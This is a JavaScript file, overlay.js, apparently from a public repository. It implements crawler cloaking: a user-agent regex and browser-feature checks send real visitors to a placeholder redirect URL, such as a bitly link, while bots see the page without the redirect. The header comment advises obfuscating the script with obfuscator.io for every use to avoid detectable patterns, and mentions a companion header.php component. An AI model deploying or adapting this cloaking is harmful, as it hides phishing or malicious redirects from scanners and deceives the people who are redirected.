-
Notifications
You must be signed in to change notification settings - Fork 15
/
Copy pathoverlay.js
54 lines (46 loc) · 2.17 KB
/
overlay.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/**
* Demo example of redirecting if crawler.
* Naturally you would want to implement more robust bot checking depending on your use case.
* You'll want to run this script through https://obfuscator.io to get a unique version each time to avoid any patterns.
* Note the uppercase tokens in the script as it is meant to be used with the 'header.php' component to generate these variables.
* If you wish to use this as a standalone script, replace the 'crawlerUserAgentPattern' token with a regex user agent string, and the redirectUrl token with your bitly url.
* If you plan to use it with the server side component, you do not need to change these tokens.
*
*/
var redirectUrl = 'REDIRECT_URL';
var crawlerUserAgentPattern = 'BLOCKED_USER_AGENTS';
function checkUserAgent() {
var test = new RegExp(crawlerUserAgentPattern, 'i');
var userAgent = navigator.userAgent;
return !test.test(userAgent);
}
function checkFeatures() {
var isOpera = (!!window.opr && !!opr.addons) || !!window.opera || navigator.userAgent.indexOf(' OPR/') >= 0;
var isFirefox = typeof InstallTrigger !== 'undefined';
var isSafari = /constructor/i.test(window.HTMLElement) || (function (p) {
return p.toString() === '[object SafariRemoteNotification]';
})(!window['safari'] || (typeof safari !== 'undefined' && safari.pushNotification));
var isIE = /*@cc_on!@*/false || !!document.documentMode;
var isEdge = !isIE && !!window.StyleMedia;
var isChrome = !!window.chrome && (!!window.chrome.webstore || !!window.chrome.runtime);
var isEdgeChromium = isChrome && (navigator.userAgent.indexOf('Edg') != -1);
var isBlink = (isChrome || isOpera) && !!window.CSS;
var browsers = [isOpera, isFirefox, isSafari, isIE, isEdge, isChrome, isEdgeChromium, isBlink];
var passes = false;
browsers.forEach(function (browser) {
if (browser) {
passes = true;
}
});
return passes;
}
if (checkUserAgent() && checkFeatures()) {
window.location.replace(redirectUrl);
}
else {
document.addEventListener('DOMContentLoaded', function () {
var overlay = document.getElementById('overlay');
overlay.style.display = 'none';
overlay.parentNode.removeChild(overlay);
});
}